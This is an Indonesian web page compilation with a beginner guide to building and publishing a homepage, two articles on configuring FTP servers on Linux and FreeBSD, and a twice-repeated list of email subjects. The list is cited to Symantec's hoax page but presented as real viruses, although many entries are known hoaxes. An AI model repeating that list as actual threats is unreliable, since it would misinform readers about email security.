yayasan atau organisasi non profit memiliki situs internet. Tujuannya adalah untuk menyuarakan
aspirasi mereka kepada publik internasional, baik hanya sekedar brosur organisasi ataupun ajakan
berbuat kebaikan seperti yang ditampilkan oleh beberapa situs perlindungan satwa langka..
Tampaknya soal menulis dokumen untuk sebuah situs internet sudah menjadi tuntutan setiap orang dan
sudah merupakan salah satu skill atau ketrampilan yang perlu dipelajari tiap orang saat ini.
Membuat sebuah dokumen untuk disimpan di halaman homepage situs internet sebenarnya bukanlah hal yang
sulit pada saat ini, karena Microsoft telah membuat aplikasi word processor ataupun spreadsheet yang
dapat membuat file dengan format HTML.
Bila anda sudah memiliki Office 2000 pada komputer anda, ketika anda bekerja pada MS Word ataupun
Excell, file dokumen anda dapat disimpan dengan format HTML secara mudah yaitu dengan melakukan
perintah (klik) File kemudian save as, pada windows yang tampak isilah nama file anda dan pilihlah
format dokumen anda sebagai web pages, atau HTML.
Agar dokumen itu dapat tampil dengan lebih baik dan lebih indah anda perlu merencanakan dulu susunan
dan tampilan dokumen anda diatas kertas. Kemudian bila diperlukan gambar-gambar yang menarik anda
perlu mempergunakan software gambar atau scaner.
Tulisan ini dimaksudkan untuk memberikan panduan ringkas kepada anda dengan alat bantu sederhana, agar
anda bisa membuat halaman homepages beberapa halaman secar cepat meskipun tidak mempergunakan software
web desain khusus.
Program (software) yang dipergunakan:
1. Netscape Composer atau Frontpage Express untuk membuat halaman kosong.
2. Notepad untuk edit text dan kode HTML secara cepat. WSFTP32 untuk mentrasferkan file homapage
dari komputer anda ke web server.
3. Photoshop 5.0 atau Paintbrush untuk membuat/mengedit gambar atau video yang akan ditambahkan
pada homepage anda.
4. Microsoft Word 97 dipergunakan apabila anda hendak menulis artikel dan langsung disimpan (save)
dalam file berformat HTML.
Syarat teknis
1. Telah memiliki domain.
2. Telah memiliki ruang (atau space) penyimpan file anda dalam web server yang disimpan di ISP.
Biasa disebut Web Hosting Service.
Web server adalah komputer yang berfungsi sebagai server web site, server ini disimpan di Internet
Service Provider agar terhubung ke internet selama 24 jam nonstop. Apabila Web server disimpan di
tempat maka anda perlu memiliki saluran komunikasi data kontinyu (terus menerus) 24 jam non stop ke
ISP terdekat.
3. PC Windows 95 atau Windows 98, processor minimal AT 486, RAM 16 mbyte, Hardisk 1 Gbyte. PC
Pentium dengan RAM > 32 Mbyte dan Hardisk > 1 Gbyte akan lebih baik lagi.
4. Sambungan internet
Format penulisan
Di bagian depan (cover) biasa diisi dengan daftar isi yang dihubungkan (atau dilink-kan) ke halaman
yang berisi uraian lengkapnya. Bagian depan ini biasa disebut home Setiap judul, selalu diikuti dengan
ulasan singkatnya. Ini yang membedakannya dari daftar isi sebuah buku. Logo juga biasa diletakkan di
sudut kiri atau kanan atas. Lay out penulisan, bisa diatur dengan mempergunakan tabel yang tidak
bergaris (atau border tabel diberi nilai nol).
Bagian tengah situs anda, dapat diisi dengan uraian lengkap berikut gambar-gambarnya.
Setiap halaman atau judul maupun sub-judul dihubungkan satu sama lain mempergunakan link.
Penulisan Informasi
Penulisan informasi anda dibuat seringkas mungkin, padat, jelas dan menarik. Bila anda hendak
mempublikasikan dokumen anda di intenet dalam bentuk aslinya (misalnya halaman buku yang discanning,
atau dokumen yang anda tulis mempergunakan MS Word 6.0) bisa juga disimpan dalam web server namun
sebaiknya diubah dulu format file dokumen anda tersebut dengan Adobe Acrobat, agar file dokumen anda
bentuknya tetap, namun ukuran file yang disimpan di dalam web server jauh lebih kecil. Ini akan
menguntungkan anda karena dengan begitu pengguna internet akan dengan mudah dan cepat mendapatkan file
dokumen tersebut dari web server anda ke komputernya.
Sebelum menulis buat rencana kerjanya terlebih dahulu. Yang perlu diperhatikan antara lain :
* Anda harus mengumpulkan bahan yang akan anda masukan ke dalam homepage anda.
* Pelajari bahan tersebut, buat rangkumannya pada kertas kerja anda, tambahkan perkiraan waktu
untuk mengerjakannya berapa jam.
* Bagilah rangkuman tersebut dalam beberapa kelompok (bisa dilihat dari sub-sub judulnya kalau
ada). Setiap halaman pada kertas kerja diberikan nomor urut. Semua sub-sub judul ini dapat dituliskan
di halaman depan.
* Buatlah direktori di PC Windows anda sesuai nama pekerjaannya, misalnya anda membuat homepage
SMU1, nama ini bisa dijadikan nama direktori tsb.
* Buatlah gambar, foto atau video dan suara agar bisa dimuat dalam homepage. Format gambar umumnya
berupa file.gif atau file.jpg. Sedangkan format video biasanya namafile.avi. Foto terlebih dahulu
discan menggunakan alat scanner, bila anda belum mempunyai alat ini, bisa meminta bantuan rental
komputer yang menyediakan jasa scanning. Bila jumlah gambar yang akan dimuat cukup banyak, ukuran
gambar perlu diperhatikan karena terlalu besar ukuran gambar dan terlalu banyak jumlah gambar di
homepage anda akan mempersulit pengguna internet nantinya ketika mengakses situs anda. Berilah nama
(atau nomor) dengan baik berikut catatan nomor halaman homepage yang akan anda lengkapi dengan gambar.
* Tuliskan tulisan anda pada tiap halaman dan aturlah layoutnya. Cara mengatur layout HTML lihat
Mengatur Layout Halaman Homepage.
* Membuat halaman HTML, secara cepat dapat anda lakukan langkah berikut : pertama bukalah browser
Netscape atau Frontpage Express. Buatlah satu halaman kosong dan simpanlah (save) didalam direktori
anda tadi, misalnya direktori anda tadi yaitu SMU1. Coba anda buka file ini dengan Internet Explorer
atau Nestcape Navigator, kemudian pilih perintah View dan klik source atau page source. Anda akan
melihat kode HTML pada halaman kosong anda tadi.
* Langkah kedua, bukalah Windows Explorer anda, buka direktori SMU1, cek apakah file kosong tadi
sudah tersimpan disitu. Bila sudah anda lihat, geserkan kursor mouse ke atas nama filenya dan klik.
Lakukan perintah copy agar file ini tercopy beberapa buah. Jumlah file yang dicopy tergantung
kebutuhan anda menulis, bila nanti ketika anda menulis ternyata kurang, kekurangan file kosong ini
dapat diatasi dengan cara mengcopy ulang atau membuat ulang halaman kosong yang dibutuhkan. Gantilah
nama file hasil pengcopyan tadi dengan nama yang berurutan misalnya anda beri nama hal01.html, file
berikutnya anda beri nama hal02.html, hal03.html dan seterusnya.
* Langkah ketiga adalah mengisi halaman kosong berformat HTML tadi dengan informasi anda. Cara
menuliskannya anda bisa mempergunakan Netscape Composer atau Frontpage Express. Tetapi anda juga dapat
mengisi dengan Notepad untuk penulisan teks atau editing halaman HTML secara cepat. Panduan menulis
informasi anda dengan penulisan kode HTML dapat anda baca pada makalah Pengenalan HTML
Cek Jumlah Pengakses Situs Anda
Untuk mengetahui berapa orang yang sudah mengakses situs anda, anda bisa menambahkan counter di
halaman depan homepage anda
Respon Pengakses
Agar anda bisa menerima masukan atau respon dari pengakses situs anda, anda juga perlu menambahkan
alamat anda secara lengkap pada homepage anda, berikut emailnya
Formulir Pendaftaran
Apabila diinginkan pengakses situs anda mendaftarkan dirinya, anda dapat menambahkan form pendaftaran
di halaman situs anda dihalaman manapun
Search Engine
Jika anda ingin memberikan kemudahan kepada pengakses situs anda supaya lebih cepat mencapai halaman
yang berisi uraian yang sesuai dengan kata kunci yang diketiknya, anda dapat menambahkan search engine
Published
File homepage anda yang sudah anda buat didalam direktori tadi, segera copykan ke disket. Kemudian
berikan disket tersebut kepada adminstrator jaringan di tempat anda. Apabila anda merangkap
administratornya, anda bisa langsung menempatkan file tersebut kedalam direktori www di dalam web
server anda. Cara penempatan ini bisa dibantu dengan mempergunakan perangkat WSFTP32, atau bila anda
langsung didepan servernya, anda bisa langsung memasukan file tersebut kedalam direktorinya. File
homepage ini bisa anda panggil pada browser dengan memanggil http://nama domain anda.
Selanjutnya anda perlu mendaftarkan situs anda pada search engine seperti Google; Netscape; Catcha;
Yahoo dan search engine lainnya. Umumnya search engine memberikan pendaftaran gratis dan non gratis,
anda dapat memilih yang gratis. Selamat mencoba.
Daftar Virus Dari Symantec
Daftar Virus Dari Symantec
(Lebih jauh bisa dilihat di dalam situs hoax from Symantec)
Symantec Security Incorp. telah menemukan virus yang termuat didalam email dengan subjek-subjek berikut dibawah ini.
Agar anda tidak terkena aksi virus tersebut langkah yang paling tepat adalah anda tidak perlu membacanya dan
sebaiknya segera menghapus email tersebut.
Subjek-subjek email Yang Sering di tuliskan dalam Email bervirus :
$800 from Microsoft
3b Trojan
AIDS
Antichrist
AOL4Free Virus
AOL and Intel
AOL.EXE
AOL Flashing IM
AOL RIOT 2 Virus
AOL Year 2000 Update
Awareness Virus
Baby New Year Virus
Bad Times
Be My Valentine
Be Spooked
BestBuy Order Fraud Alert
Bicho7
Big Brother
Blue Mountain Virus
Blueballs Are Underrated Virus
BUDDYLST.ZIP
BUDSAVER.EXE
Budweiser
BUGGLST
California IBM
California Virus
CELLSAVER Virus
CLEANMGR.EXE Warning
Coke.exe
D@Fit
Dana
Dear Friends
Death69
Deeyenda
Desi1love
Despite Virus
Discount Virus
DR.SIMON.WAJNTRAUBWS
E-Flu
eBook
Economic Slow Down
Elecciones 2000
EVIL THE CAT Virus
Family Pictures
FatCat Virus
February 1
Flashmaster G
Flower for You
Foot N Mouth Virus Warning
Forward
FREE M & M's
Free Money
Free Pizza Virus
FROGAPULT, ELFBOWL, Y2KGAME Virus
Gamma2.exe
GAP Email Tracking
Get More Money
Ghost
Gift from Microsoft
Girl Thing
Go Hip
Goldbear Virus
Good Times
Got You
Guts to Say Jesus
Hacky Birthday Virus
Halloween Virus
Happy New Year Virus
Hello Dear
Hairy Palms Virus
Help Poor Dog
Hitler
How to Give a Cat a Colonic
INFILTER
Information on SARC 'Virus Test'
Iraq War
Irina
Irish Virus
Jan1st20.exe Virus
Jdbgmgr.exe file
John Kennedy Jr Trojan
Join the Crew
Launch Nuclear Strike Now
Let's Watch TV
Life is Beautiful
Londhouse Virus
Lotus Notes Worm
Lump of Coal Virus
Macdonald's Screensaver
Matrix Virus
Microsoft Virus
Millennium Time Bomb
MobilVirus
MOBILE PHONE
MSN Messenger add a Contact
MusicPanel
NASTYFRIEND99
The New Ice Age
NEWYORK BIG DIRT
Norman Virus
Norton anti - virus v5
Osama vs Bush
Outback Steakhouse
Pandemic
Penpal Greetings
Perrin.exe Virus
Phantom Menace Virus
Pikachus Ball
Playboy Girls
Pluperfect
Postal Service Email Charge
Red Alert
Sandman
Sarc Virus Test
Scoutshacker
Simon Pugh
Slavemaster
South Park News Letter
SULFNBK.EXE Warning
Symantec ASDL Virus
Teletubbies
Time Bomb
Tuxissa
Upgrade Internet 2
Very Cool
Virtual Card for You Virus
Virtual Card Virus
Virus Business
W2 Sync Virus
W32-PrPlCrcl-G
W32.MFG.Tassos@mm
W32.XPExp.Worm
Wait 48 Hours
Watching
WAZ UP
Win a Holiday
Windows will Fail on Jan 1
Wobbler Virus
Wooden Horse
WordScribe Virus
Work Virus
World Domination
WTC Survivor
Y2K7 Virus
Yellow Teletubbies
Zlatko
ZZ331 Virus
(Lebih jauh bisa dilihat di dalam situs hoax from Symantec)
Symantec Security Incorp. telah menemukan virus yang termuat didalam email dengan subjek-subjek berikut dibawah ini.
Agar anda tidak terkena aksi virus tersebut langkah yang paling tepat adalah anda tidak perlu membacanya dan
sebaiknya segera menghapus email tersebut.
Subjek-subjek email Yang Sering di tuliskan dalam Email bervirus :
$800 from Microsoft
3b Trojan
AIDS
Antichrist
AOL4Free Virus
AOL and Intel
AOL.EXE
AOL Flashing IM
AOL RIOT 2 Virus
AOL Year 2000 Update
Awareness Virus
Baby New Year Virus
Bad Times
Be My Valentine
Be Spooked
BestBuy Order Fraud Alert
Bicho7
Big Brother
Blue Mountain Virus
Blueballs Are Underrated Virus
BUDDYLST.ZIP
BUDSAVER.EXE
Budweiser
BUGGLST
California IBM
California Virus
CELLSAVER Virus
CLEANMGR.EXE Warning
Coke.exe
D@Fit
Dana
Dear Friends
Death69
Deeyenda
Desi1love
Despite Virus
Discount Virus
DR.SIMON.WAJNTRAUBWS
E-Flu
eBook
Economic Slow Down
Elecciones 2000
EVIL THE CAT Virus
Family Pictures
FatCat Virus
February 1
Flashmaster G
Flower for You
Foot N Mouth Virus Warning
Forward
FREE M & M's
Free Money
Free Pizza Virus
FROGAPULT, ELFBOWL, Y2KGAME Virus
Gamma2.exe
GAP Email Tracking
Get More Money
Ghost
Gift from Microsoft
Girl Thing
Go Hip
Goldbear Virus
Good Times
Got You
Guts to Say Jesus
Hacky Birthday Virus
Halloween Virus
Happy New Year Virus
Hello Dear
Hairy Palms Virus
Help Poor Dog
Hitler
How to Give a Cat a Colonic
INFILTER
Information on SARC 'Virus Test'
Iraq War
Irina
Irish Virus
Jan1st20.exe Virus
Jdbgmgr.exe file
John Kennedy Jr Trojan
Join the Crew
Launch Nuclear Strike Now
Let's Watch TV
Life is Beautiful
Londhouse Virus
Lotus Notes Worm
Lump of Coal Virus
Macdonald's Screensaver
Matrix Virus
Microsoft Virus
Millennium Time Bomb
MobilVirus
MOBILE PHONE
MSN Messenger add a Contact
MusicPanel
NASTYFRIEND99
The New Ice Age
NEWYORK BIG DIRT
Norman Virus
Norton anti - virus v5
Osama vs Bush
Outback Steakhouse
Pandemic
Penpal Greetings
Perrin.exe Virus
Phantom Menace Virus
Pikachus Ball
Playboy Girls
Pluperfect
Postal Service Email Charge
Red Alert
Sandman
Sarc Virus Test
Scoutshacker
Simon Pugh
Slavemaster
South Park News Letter
SULFNBK.EXE Warning
Symantec ASDL Virus
Teletubbies
Time Bomb
Tuxissa
Upgrade Internet 2
Very Cool
Virtual Card for You Virus
Virtual Card Virus
Virus Business
W2 Sync Virus
W32-PrPlCrcl-G
W32.MFG.Tassos@mm
W32.XPExp.Worm
Wait 48 Hours
Watching
WAZ UP
Win a Holiday
Windows will Fail on Jan 1
Wobbler Virus
Wooden Horse
WordScribe Virus
Work Virus
World Domination
WTC Survivor
Y2K7 Virus
Yellow Teletubbies
Zlatko
ZZ331 Virus
Setup File Transfer Protocol (FTP) bagian II
Setup File Transfer Protocol (FTP) bagian II
Oleh : Jean Piere N. S.
Program FTP server biasanya berupa sebuah program tunggal yang dapat dieksekusi seperti berupa file program ftpd, in.ftpd, atau nama file program yang serupa lainnya. Biasanya file program ini terletak di direktori /sbin atau /usr/sbin. Namun kinerja program ini dalam memberi servis kepada user amat tergantung kepada seting superserver inetd yang mengendalikan aliran data request dari user ke port 21 didalam server. Pemeriksaan server dengan fasilitas ftp ini perlu dilakukan secara rutin khususnya pada bagian file log, agar dapat dilihat ada tidaknya penyusup yang bermaksud merusak system file server .
1. Pendahuluan
Pada bagian I sudah diuraikan bagaimana menginstal ftp pada sebuah server yang sedang berjalan. Dalam uraian berikut, diuraikan bagaimana menginstal ftp pada server yang baru dibuat. Ketika proses instalasi sistem operasi server dilakukan, kita juga harus membuat slice untuk ftp. Kemudian di dalam uraian ini dipaparkan bagaimana menginstal ftp pada server Caldera OpenLinux sebagai contoh server unix disini.
Servis FTP begitu sederhana untuk digunakan dan dikelola, sehingga langkah setup servis FTP menarik untuk dilakukan pada waktu setup sebuah server. Syaratnya software unix Linux atau FreeBSD yang dimiliki harus sudah dilengkapi dengan file program FTP server. Langkah utama pada setup servis FTP antara lain :
* Installasi software server
* Konfigurasi superserver Internet
* Konfigurasi direktori FTP
* Mengelola server
2. Instalasi Software Server
Program FTP server biasanya berupa sebuah program tunggal yang dapat dieksekusi seperti berupa file program ftpd, in.ftpd, atau nama file program yang serupa lainnya. Biasanya file program ini terletak di direktori /sbin or /usr/sbin. Pada sistem yang kami uji, FTP server merupakan salah satu komponen program yang terinstalasi pada saat instalasi software server.
Software Caldera OpenLinux telah dilengkapi dengan file program FTP server yang umum digunakan orang, dan dikembangkan di Universitas Washington. File server yang dapat dieksekusi ini diberi nama in.ftpd dan diletakan di direktori /usr/sbin/. Begitu program FTP server itu diinstalasi ke komputer, FTP server akan memberikan servis akses file file yang ada di dalam direktori FTP kepada tiap user yang sudah memiliki account di server tersebut. Sehingga begitu anda login ke system server secara remote melalui servis FTP dengan memasukan username anda dan password ke dalam system itu, maka anda dapat mengakses file file di dalam direktori home anda untuk membaca atau menulis file. Anda juga bisa membaca atau mendownload file file lain.
3. Konfigurasi Superserver Internet
Penempatan file program FTP server yang bisa dikesekusi di dalam komputer anda belumlah cukup untuk menjalankan servis akses FTP. Anda harus memiliki kepastian bahwa ketika FTP server bereaksi atas request yang datang. Request yang datang berupa sambungan ke TCP port 21, yaitu port yang diperuntukan untuk akses FTP. Metoda standar untuk bereaksi atas request yang datang adalah melalui pengaturan pada file program inetd, yaitu superserver Internet. Server ini dikonfigurasi melalui file /etc/inetd.conf. Pada sistem yang kami uji, Caldera OpenLinux installer menempatkan entry berikut ini pada file /etc/inetd.conf:
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
Dua switch perintah berikut ini digunakan untuk menginstalasi server agar melakukan log ke dalam system. ( yaitu swicth perintah -l) dan penggunaan file ftpaccess. File ini adalah tambahan. Bila file ini ada, maka FTP server akan menggunakan file ini sebagai bagian dari setup tambahan konfigurasi server. Penjelasan lebih lanjut bisa dibaca pada manualnya (yaitu man ftpaccess).
4. Mengkonfigurasi Akses Anonymous
Seorang user yang telah terdaftar di dalam server, biasanya dapat memakai sarana FTP setelah orang itu memasukan userIDnya. Kemudian orang itu dapat melihat atau membaca atau mengambil file file yang bisa dieksekusi yang ada di dalam direktori FTP. User yang sudah terdaftar biasanya dapat dipercaya dan akan mengikuti peraturan yang dibuat oleh admin server, dengan tujuan agar server itu dapat beroperasi dengan aman dan baik.
Akan tetapi bagi seorang user anonymous, login ke server harus dibatasi karena mungkin saja orang yang login dengan status anonymous adalah seorang intruder yang bisa merusak server. Karena itu orang yang login sebagai user anonymous ke dalam server anda haruslah dibatasi baik dalam hal download file nya maupun dalam hal menambahkan file ke direktori publik di dalam FTP server.
Biasanya sebuah server yang akan dibuat dapat memberikan servis FTP kepada user anonymous, selalu dilengkapi dengan form interface text untuk pendaftaran user anonymous berikut mendaftarkan passwordnya yang berupa email user tersebut. Pendaftaran user ini tidak ditujukan untuk akses interaktif user dengan server, dan tidak memerlukan password khusus. Walaupun begitu, ketika user anonymous tersambung ke FTP server, maka FTP server akan memakai account user itu sebagai landasan untuk memberikan ijin kepada user akses ke file file di dalam sevrer.
Lebih lanjut, user anonymous hanya boleh melihat yang diletakan di direktori home yang berasosiasi dengan userID ftp. User juga bisa mendownload file yang ada di dalam direktori ini, dan direktori ini bisa dilengkapi dengan perintah ls dan copy khusus direktori etc. Selama sesi anonymous, FTP server memakai direktori home ftp sebagai root direktori nya.;dengan kata lain user anonymous hanya bisa melihat file yang bisa dieksekusi dan file lain yang ada di dalam copy direktori /etc saja dan bukan direktori /etc yang asli. Ini dibuat untuk mencegah seorang user anonymous akses ke file file di dalam direktori asli /etc/passwd (yang berisi banyak password teenkripsi dari user user server yang harus dijaga keamanannya
User ID ftp dan direktori home FTP akan dibuat otomatis oleh Caldera OpenLinux installer. File /etc/passwd nya berisi entry sebagai berikut:
ftp:x:14:50:FTP User:/home/ftp:
Di dalam /home/ftp, kami mendapatkan file file dan direktori-direktori sebagai berikut :
/home/ftp/bin/
/home/ftp/bin/gzip
/home/ftp/bin/ls
/home/ftp/bin/tar
/home/ftp/bin/zcat -> gzip
/home/ftp/etc/
/home/ftp/etc/group
/home/ftp/etc/passwd
/home/ftp/pub/
Adanya sarana utilitas tar dan gzip memungkinkan FTP server untuk memberikan isi dari sebuah direktori melalui sebuah transaksi tunggal saja. User tidak perlu mengcopy nama nama file satu persatu atau mencatat nama nama file satu persatu. Dengan perintah tar maka nama nama file yang ada di dalam sebuah direktori bisa disusun ke dalam sebuah file arsip dan bisa juga sekalian file yang berisi daftar nama file itu dikompress memakai fasilitas gzip.
5. Mengelola FTP Server
Sekali FTP server telah selesai diinstalasi dan berjalan baik, server ini hanya memerlu-
kan sedikit perhatian. Tapi kita masih bisa memeriksa server ini setiap waktu dengan membaca file log yang ada di dalam server. Dengan membaca isi file log , kita dapat memonitor apakah server ini berjalan baik atau apakah dapat mencegah penyusupan. Server juga mencatat semua pesan penting dalam file log dalam bentuk format standar file log. Dalam banyak system, file ini diletakan di dalam direktori /var/log/messages.
(Bandung, 3 Maret 2007)
Pustaka :
www.FreeBSD.org
www.ai3.itb.ac.id
www.unixcities.com
Oleh : Jean Piere N. S.
Program FTP server biasanya berupa sebuah program tunggal yang dapat dieksekusi seperti berupa file program ftpd, in.ftpd, atau nama file program yang serupa lainnya. Biasanya file program ini terletak di direktori /sbin atau /usr/sbin. Namun kinerja program ini dalam memberi servis kepada user amat tergantung kepada seting superserver inetd yang mengendalikan aliran data request dari user ke port 21 didalam server. Pemeriksaan server dengan fasilitas ftp ini perlu dilakukan secara rutin khususnya pada bagian file log, agar dapat dilihat ada tidaknya penyusup yang bermaksud merusak system file server .
1. Pendahuluan
Pada bagian I sudah diuraikan bagaimana menginstal ftp pada sebuah server yang sedang berjalan. Dalam uraian berikut, diuraikan bagaimana menginstal ftp pada server yang baru dibuat. Ketika proses instalasi sistem operasi server dilakukan, kita juga harus membuat slice untuk ftp. Kemudian di dalam uraian ini dipaparkan bagaimana menginstal ftp pada server Caldera OpenLinux sebagai contoh server unix disini.
Servis FTP begitu sederhana untuk digunakan dan dikelola, sehingga langkah setup servis FTP menarik untuk dilakukan pada waktu setup sebuah server. Syaratnya software unix Linux atau FreeBSD yang dimiliki harus sudah dilengkapi dengan file program FTP server. Langkah utama pada setup servis FTP antara lain :
* Installasi software server
* Konfigurasi superserver Internet
* Konfigurasi direktori FTP
* Mengelola server
2. Instalasi Software Server
Program FTP server biasanya berupa sebuah program tunggal yang dapat dieksekusi seperti berupa file program ftpd, in.ftpd, atau nama file program yang serupa lainnya. Biasanya file program ini terletak di direktori /sbin or /usr/sbin. Pada sistem yang kami uji, FTP server merupakan salah satu komponen program yang terinstalasi pada saat instalasi software server.
Software Caldera OpenLinux telah dilengkapi dengan file program FTP server yang umum digunakan orang, dan dikembangkan di Universitas Washington. File server yang dapat dieksekusi ini diberi nama in.ftpd dan diletakan di direktori /usr/sbin/. Begitu program FTP server itu diinstalasi ke komputer, FTP server akan memberikan servis akses file file yang ada di dalam direktori FTP kepada tiap user yang sudah memiliki account di server tersebut. Sehingga begitu anda login ke system server secara remote melalui servis FTP dengan memasukan username anda dan password ke dalam system itu, maka anda dapat mengakses file file di dalam direktori home anda untuk membaca atau menulis file. Anda juga bisa membaca atau mendownload file file lain.
3. Konfigurasi Superserver Internet
Penempatan file program FTP server yang bisa dikesekusi di dalam komputer anda belumlah cukup untuk menjalankan servis akses FTP. Anda harus memiliki kepastian bahwa ketika FTP server bereaksi atas request yang datang. Request yang datang berupa sambungan ke TCP port 21, yaitu port yang diperuntukan untuk akses FTP. Metoda standar untuk bereaksi atas request yang datang adalah melalui pengaturan pada file program inetd, yaitu superserver Internet. Server ini dikonfigurasi melalui file /etc/inetd.conf. Pada sistem yang kami uji, Caldera OpenLinux installer menempatkan entry berikut ini pada file /etc/inetd.conf:
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
Dua switch perintah berikut ini digunakan untuk menginstalasi server agar melakukan log ke dalam system. ( yaitu swicth perintah -l) dan penggunaan file ftpaccess. File ini adalah tambahan. Bila file ini ada, maka FTP server akan menggunakan file ini sebagai bagian dari setup tambahan konfigurasi server. Penjelasan lebih lanjut bisa dibaca pada manualnya (yaitu man ftpaccess).
4. Mengkonfigurasi Akses Anonymous
Seorang user yang telah terdaftar di dalam server, biasanya dapat memakai sarana FTP setelah orang itu memasukan userIDnya. Kemudian orang itu dapat melihat atau membaca atau mengambil file file yang bisa dieksekusi yang ada di dalam direktori FTP. User yang sudah terdaftar biasanya dapat dipercaya dan akan mengikuti peraturan yang dibuat oleh admin server, dengan tujuan agar server itu dapat beroperasi dengan aman dan baik.
Akan tetapi bagi seorang user anonymous, login ke server harus dibatasi karena mungkin saja orang yang login dengan status anonymous adalah seorang intruder yang bisa merusak server. Karena itu orang yang login sebagai user anonymous ke dalam server anda haruslah dibatasi baik dalam hal download file nya maupun dalam hal menambahkan file ke direktori publik di dalam FTP server.
Biasanya sebuah server yang akan dibuat dapat memberikan servis FTP kepada user anonymous, selalu dilengkapi dengan form interface text untuk pendaftaran user anonymous berikut mendaftarkan passwordnya yang berupa email user tersebut. Pendaftaran user ini tidak ditujukan untuk akses interaktif user dengan server, dan tidak memerlukan password khusus. Walaupun begitu, ketika user anonymous tersambung ke FTP server, maka FTP server akan memakai account user itu sebagai landasan untuk memberikan ijin kepada user akses ke file file di dalam sevrer.
Lebih lanjut, user anonymous hanya boleh melihat yang diletakan di direktori home yang berasosiasi dengan userID ftp. User juga bisa mendownload file yang ada di dalam direktori ini, dan direktori ini bisa dilengkapi dengan perintah ls dan copy khusus direktori etc. Selama sesi anonymous, FTP server memakai direktori home ftp sebagai root direktori nya.;dengan kata lain user anonymous hanya bisa melihat file yang bisa dieksekusi dan file lain yang ada di dalam copy direktori /etc saja dan bukan direktori /etc yang asli. Ini dibuat untuk mencegah seorang user anonymous akses ke file file di dalam direktori asli /etc/passwd (yang berisi banyak password teenkripsi dari user user server yang harus dijaga keamanannya
User ID ftp dan direktori home FTP akan dibuat otomatis oleh Caldera OpenLinux installer. File /etc/passwd nya berisi entry sebagai berikut:
ftp:x:14:50:FTP User:/home/ftp:
Di dalam /home/ftp, kami mendapatkan file file dan direktori-direktori sebagai berikut :
/home/ftp/bin/
/home/ftp/bin/gzip
/home/ftp/bin/ls
/home/ftp/bin/tar
/home/ftp/bin/zcat -> gzip
/home/ftp/etc/
/home/ftp/etc/group
/home/ftp/etc/passwd
/home/ftp/pub/
Adanya sarana utilitas tar dan gzip memungkinkan FTP server untuk memberikan isi dari sebuah direktori melalui sebuah transaksi tunggal saja. User tidak perlu mengcopy nama nama file satu persatu atau mencatat nama nama file satu persatu. Dengan perintah tar maka nama nama file yang ada di dalam sebuah direktori bisa disusun ke dalam sebuah file arsip dan bisa juga sekalian file yang berisi daftar nama file itu dikompress memakai fasilitas gzip.
5. Mengelola FTP Server
Sekali FTP server telah selesai diinstalasi dan berjalan baik, server ini hanya memerlu-
kan sedikit perhatian. Tapi kita masih bisa memeriksa server ini setiap waktu dengan membaca file log yang ada di dalam server. Dengan membaca isi file log , kita dapat memonitor apakah server ini berjalan baik atau apakah dapat mencegah penyusupan. Server juga mencatat semua pesan penting dalam file log dalam bentuk format standar file log. Dalam banyak system, file ini diletakan di dalam direktori /var/log/messages.
(Bandung, 3 Maret 2007)
Pustaka :
www.FreeBSD.org
www.ai3.itb.ac.id
www.unixcities.com
Setup File Transfer Protocol (FTP) bagian I
Setup File Transfer Protocol (FTP) bagian I
Oleh : Jean Piere N. S.
Di era Internet, orang yang akan mengambil file atau memindahkan file dari komputer server ke komputernya sendiri memakai program aplikasi FTP client. Program FTP server hanya dijalankan di dalam komputer server saja untuk menjawab request pemindahan file yang dikirim oleh komputer user dan akan mendownload file dari server ke komputer tersebut. Direktori FTP di dalam server merupakan sebuah slice tersendiri, dan dikendalikan oleh daemon ftp.Bila hendak membuat file database dari user ftp, pergunakanlah gid dan uid dari system yang ada dan pilihlah gid serta uid yang tidak tidak terpakai.
1. Pendahuluan
File Transfer Protocol atau protocol kirim file (biasa disingkat FTP) Internet adalah nenek moyang dari protokol pembagian file (atau sharing file) yang terdapat di dalam server unix. Pada jaman dulu, ketika komputer desktop belum dilengkapi interface user grafis (GUI), orang memakai FTP di dalam server unix dengan cara remote login dan melakukan perintah perintah unix untuk memindahkan file dari server unix ke dalam komputer dekstopnya.
Walau pada awalnya berbentuk tidak menarik dan berbeda dari bentuk yang ada sekarang, fasilitas server ini terus berkembang, terutama program FTP client untuk computer desktop telah dilengkapi dengan interface fungsi fungsi yang menarik dan dilengkapi dengan GUI (atau graphical user interface). Akhirnya pengguna computer desktop yang memindahkan file dari server ke dalam komputernya, merasa seperti memindahkan file dari folder ke folder.
Dalam artikel ini diulas tentang bagaimana setup FTP server dalam salah satu server unix yaitu server FreeBSD. Karena FTP server dibuat standard (dengan penggunaan SUIDDIR) sehingga banyak orang yang mengetahui FTP server dan dapat melakukan serangan atas server ini, maka disarankan sebaiknya selalu memperhatikan sisi keamanan server ketika melakukan konfigurasinya. Ketidak hati hatian disini bisa menimbulkan persoalan keamanan server. Penulis percaya bahwa langkah langkah setup berikut ini tidak akan menimbulkan masalah keamanan server. Tetapi berhati hati dan teliti dalam mengerjakan tiap proses adalah baik. Gunakanlah password yang sulit ditebak orang dan kalau harus diberitahukan kepada orang lain, beritahukanlah kepada sedikit orang saja.
2. Setup FTP Server
Membuat servis ftp server untuk siapa saja atau user anonymous amatlah sederhana. Meskipun mungkin saja ketika mensetup ftp server pada syste, akan dihadapi masalah yang kompleks. Berikut ini adalah inti langkah langkah yang dilakukan ketika setup ftp server .
Langkah 1: Set up direktori baru untuk ftp.
Bahaya pertama ketika membuat fasilitas upload anonymous FTP adalah kemungkinan adanya orang orang memasukan file file mereka ke dalam hardisk server kita sampai penuh. CERT menyarankan agar direktori upload dibuat pada sebuah dedicated drive (atau drive khusus); drive demikian bisa dibuat dengan cara membuat partisi khusus untuk upload FTP..
Pembuatan ruang baru di dalam hardisk server amat tergantung pada kondisi server. Bila server masih dalam proses awal instalasi sistem operasi, maka kita bisa melakukan penambahan partisi atau slice untuk ftp server (lihat Instalasi FreeBSd). Lain halnya kalau server yang akan dilengkapi fasilitas ftp itu, sudah berupa server jadi maka disarankan mengikuti langkah nomor 2.
